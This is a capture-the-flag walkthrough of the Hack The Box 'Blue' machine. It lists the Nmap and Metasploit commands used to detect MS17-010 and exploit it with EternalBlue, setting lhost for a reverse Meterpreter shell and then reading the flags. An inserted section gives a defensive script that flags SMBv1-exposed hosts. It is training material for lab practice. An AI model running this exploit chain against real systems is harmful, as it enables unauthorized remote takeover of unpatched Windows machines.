I’ve just completed a walkthrough of the “Blue” machine on Hack The Box, which marks the end of the beginner track for me! If you’re following along, I’ve got the “Lame” machine walkthrough linked on my channel, so you can finish the whole track too.

Machine Name: HackTheBox Blue

Difficulty: Easy

Demonstrated Concept: Exploiting Windows through the EternalBlue vulnerability.

My Approach to the “Blue” Machine

1. Initial Reconnaissance (Nmap Scan)

I kicked things off with an Nmap scan to scout for open ports and services on the target machine.

  • Command Used: nmap -sV -sC [IP_ADDRESS]

The scan immediately highlighted several open ports, many of which were related to SMB (Server Message Block), specifically ports 135, 139, and 445. The Nmap results were quite telling: SMBv1 was enabled, and the target was running Windows 7 Professional Service Pack 1. This combination screamed “EternalBlue vulnerability” to me!
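The same scan result is what a defender auditing their own network wants to catch before anyone else does. The script below is an added example, not part of the original walkthrough: it parses Nmap XML output (as written by `-oX`) and flags hosts that show the combination described above. The sample XML, the 192.0.2.x addresses, the `smb_exposure` function and the legacy-OS list are all constructed assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample shaped like `nmap -sV -sC -oX` output (not from the post).
# 192.0.2.x are documentation addresses.
SAMPLE_XML = """<nmaprun>
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/></port>
      <port protocol="tcp" portid="139"><state state="open"/></port>
      <port protocol="tcp" portid="445"><state state="open"/></port>
    </ports>
    <hostscript>
      <script id="smb-os-discovery" output="(constructed)">
        <elem key="os">Windows 7 Professional 7601 Service Pack 1</elem>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="192.0.2.20" addrtype="ipv4"/>
    <ports><port protocol="tcp" portid="445"><state state="filtered"/></port></ports>
  </host>
</nmaprun>"""

# Ports the walkthrough called out in its scan results.
WATCHED_PORTS = {"135", "139", "445"}
# Assumed list of OS strings that ship with SMBv1 enabled; extend as needed.
LEGACY_OS = ("Windows XP", "Windows Vista", "Windows 7", "Server 2003", "Server 2008")

def smb_exposure(xml_text):
    """Return one finding per host with any watched port open."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        open_ports = sorted(
            (p.get("portid") for p in host.iter("port")
             if p.get("portid") in WATCHED_PORTS
             and p.find("state") is not None
             and p.find("state").get("state") == "open"), key=int)
        if not open_ports:
            continue  # filtered or closed ports are not an exposure
        os_elem = host.find(
            "hostscript/script[@id='smb-os-discovery']/elem[@key='os']")
        os_name = os_elem.text if os_elem is not None else None
        legacy = bool(os_name) and any(tag in os_name for tag in LEGACY_OS)
        findings.append({"host": addr, "ports": open_ports, "os": os_name,
                         "priority": "high" if legacy and "445" in open_ports else "review"})
    return findings
```

Hosts returned with `priority` set to `high` are the ones to patch for MS17-010 or take SMBv1 off first; `review` means a watched port is open but the OS string was missing or not on the legacy list.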

2. Enumerating SMB with Metasploit 🔍

Even if I hadn’t known about EternalBlue, the logical next step after the Nmap scan would be to dig deeper into SMB. So, I fired up Metasploit.

I started by searching for SMB-related auxiliary modules:

  • Command Used: search name:smb type:auxiliary

I found a module that could check for the MS17-010 vulnerability (which EternalBlue exploits).

  • Module Used: auxiliary/admin/smb/ms17_010_command
  • Commands Used:
    • use auxiliary/admin/smb/ms17_010_command
    • info
    • show options
    • set rhosts [IP_ADDRESS]
    • run

This initial check indicated that MS17-010 was likely exploitable. To confirm, I then used a more specific scanner module:

  • Module Used: auxiliary/scanner/smb/smb_ms17_010
  • Commands Used:
    • use auxiliary/scanner/smb/smb_ms17_010
    • info
    • show options
    • set rhosts [IP_ADDRESS]
    • run

The output clearly confirmed: “Host is likely vulnerable to MS17-010.”

3. Exploiting with EternalBlue in Metasploit

With the vulnerability confirmed, it was time for the exploit. I searched for an exploit module:

  • Command Used: search type:exploit name:smb

Then, I selected the EternalBlue exploit module:

  • Module Used: exploit/windows/smb/ms17_010_eternalblue
  • Commands Used:
    • use exploit/windows/smb/ms17_010_eternalblue
    • show options
    • set rhosts [IP_ADDRESS]

I also needed to set my local host IP for the reverse shell:

  • Command Used to Check My IP: ip a
  • Command Used to Set Local Host: set lhost [MY_IP_ADDRESS]
  • Command Used to Run Exploit: exploit

4. Troubleshooting the Exploit 🐛

The exploit didn’t work immediately. It connected and triggered the vulnerability but failed to establish a Meterpreter session, showing errors about “triggering free of corrupted buffer.” Even after Metasploit tried increasing “groom allocations,” it still failed.

I double-checked if the target machine was still online:

  • Command Used: ping [IP_ADDRESS] (It was responsive).

Reviewing the module options, I realized I hadn’t explicitly set the target operating system.

  • Command Used to Show Targets: show targets
  • Command Used to Set Target: set target 1 (Target 1 was Windows 7).
  • Command Used to Confirm Options: show options
  • Command Used to Rerun Exploit: run

Even with the target set, the exploit continued to fail. The issue seemed to be “sending egg to corrupted connection.” My final troubleshooting step was to reset the target machine on Hack The Box.

5. Successful Exploitation and Post-Exploitation 🎉

After resetting the machine, I ran the exploit again (with lhost, rhosts, and target 1 all set).

  • Command Used: exploit

This time, success! I got a Meterpreter session. From there, I dropped into a command shell:

  • Command Used: shell

Finally, I navigated to find the user and root flags:

  • Commands Used:
    • dir
    • cd Users
    • dir (This showed “Administrator” and “harris” user directories)
    • cd harris
    • type user.txt (To retrieve the user flag)

I knew the root flag, which I had already captured in a previous attempt, would be in the Administrator’s directory.

And that’s how I compromised the “Blue” machine using the EternalBlue exploit! This officially wraps up the beginner track on Hack The Box for me, although I still need to submit one flag for “Lame” to hit 100% completion. I’m excited to see which track I’ll dive into next!

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.